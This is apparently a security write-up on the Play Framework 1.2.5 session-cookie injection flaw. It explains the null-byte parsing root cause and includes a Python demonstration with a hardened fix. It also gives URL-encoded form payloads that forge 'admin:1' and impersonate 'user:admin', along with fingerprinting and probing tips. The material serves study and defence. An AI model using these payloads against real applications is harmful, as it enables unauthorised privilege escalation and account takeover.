
Play Session Injection

https://www.playframework.com/security/vulnerability/20130806-SessionInjection

Play Framework 1.2.5 stores session data client-side in a signed cookie (PLAY_SESSION). The cookie is protected by an HMAC-SHA1 signature, but its content is not encrypted.

Because of flawed session parsing logic, an attacker can inject null bytes (\x00) into a session value and make the server create additional session variables when the cookie is parsed. The server signed the cookie itself, so the forged entries pass signature verification.

This allows:

  • Privilege escalation (admin=1)
  • User impersonation (user=admin)
  • Logic manipulation without knowing the secret key

Fingerprinting Play Framework

Play can be identified via HTTP headers:

Server: Play! Framework;1.2.5;prod
Set-Cookie: PLAY_SESSION=...
Danger: Running Play as root on port 80 further increases impact (full system compromise if chained).

Session Format

Session data is encoded as:

\x00key:value\x00\x00key:value\x00

Regex used by Play:

\0([^:]*):([^\0]*)\0

Parsed into a HashMap, meaning:

  • Later keys overwrite earlier ones
  • Multiple identical keys are allowed

Root Cause Analysis

  • : is blocked in keys
  • Null bytes are allowed in values
  • Regex-based parsing is unsafe
  • No structural format (JSON/YAML/etc.)
Vulnerable Logic

session.put(matcher.group(1), matcher.group(2));

No validation of injected delimiters.


Attack Strategy

Inject encoded null bytes (%00) and separators (%3a) into a session value (e.g. username) to forge new session variables.

Examples

Privilege Escalation (admin=1)

Goal

Inject:

admin:1

Payload (URL-encoded)

authenticityToken=...&username=test3%00%00admin%3a1%00&password=...&password_...

Resulting Session (server-side)

user:test
admin:1

✔ Signed by server
✔ Treated as valid
✔ Admin access granted

User Impersonation (Overwrite user)

Goal

Log in as admin

Payload to Register:

authenticityToken=...&username=test3%00%00user%3aadmin%00&password=...&password_...

Parsed Session Order

user:test
user:admin

✔ HashMap keeps last value
✔ User becomes admin


Why the Signature Doesn’t Save You

  • Injection happens before signing
  • Server signs attacker-controlled data
  • HMAC only protects integrity, not logic
  • No canonicalization before signing
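The parse-then-overwrite behaviour and the "signature doesn't help" argument above, as an added example that is not Play's own code: a Python re-implementation of the page's regex parse with dict (HashMap) semantics, a simplified HMAC-SHA1 step standing in for Play's cookie signature, and a hardened serializer that refuses delimiter characters before anything is signed. The secret and the usernames are constructed for the demonstration.

```python
import hashlib
import hmac
import re

# Session regex from the page: \0key:value\0 (re-implemented here, not Play's code)
SESSION_RE = re.compile(r"\x00([^:]*):([^\x00]*)\x00")

def serialize(session: dict) -> str:
    """Mirror of the vulnerable format: entries are concatenated with no escaping."""
    return "".join(f"\x00{k}:{v}\x00" for k, v in session.items())

def parse(data: str) -> dict:
    """Regex parse into a dict; like a HashMap, a later key overwrites an earlier one."""
    session = {}
    for m in SESSION_RE.finditer(data):
        session[m.group(1)] = m.group(2)
    return session

def sign(data: str, secret: bytes) -> str:
    """Simplified HMAC-SHA1 over the serialized session (stand-in for Play's cookie MAC)."""
    return hmac.new(secret, data.encode(), hashlib.sha1).hexdigest()

def verify(data: str, sig: str, secret: bytes) -> bool:
    return hmac.compare_digest(sign(data, secret), sig)

def safe_serialize(session: dict) -> str:
    """Hardened variant: reject delimiter characters before the cookie is signed."""
    for k, v in session.items():
        if "\x00" in k or ":" in k or "\x00" in v:
            raise ValueError(f"delimiter character in session entry {k!r}")
    return serialize(session)

def vulnerable_login(username: str) -> dict:
    """Store the submitted username, sign the cookie, verify it, then parse it back."""
    secret = b"constructed-example-secret"          # constructed, not a real key
    data = serialize({"user": username})            # value stored straight from the request
    sig = sign(data, secret)
    if not verify(data, sig, secret):                # the MAC is valid: the server produced it
        return {}
    return parse(data)                               # ...yet extra keys appear after parsing

def hardened_login(username: str) -> bool:
    """True when the hardened serializer rejects the entry before signing."""
    try:
        safe_serialize({"user": username})
    except ValueError:
        return True
    return False
```

With the decoded form of the page's %00/%3a payload as the username, `vulnerable_login` returns a session containing `admin=1` despite a valid signature, while `hardened_login` refuses it before a cookie is ever signed.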

Black-Box Detection Tips

When testing unknown apps:

  • Look for base64 / URL-encoded cookies
  • Try injecting:
    • %00
    • %3a
  • Observe session behavior changes
  • Check for overwritten values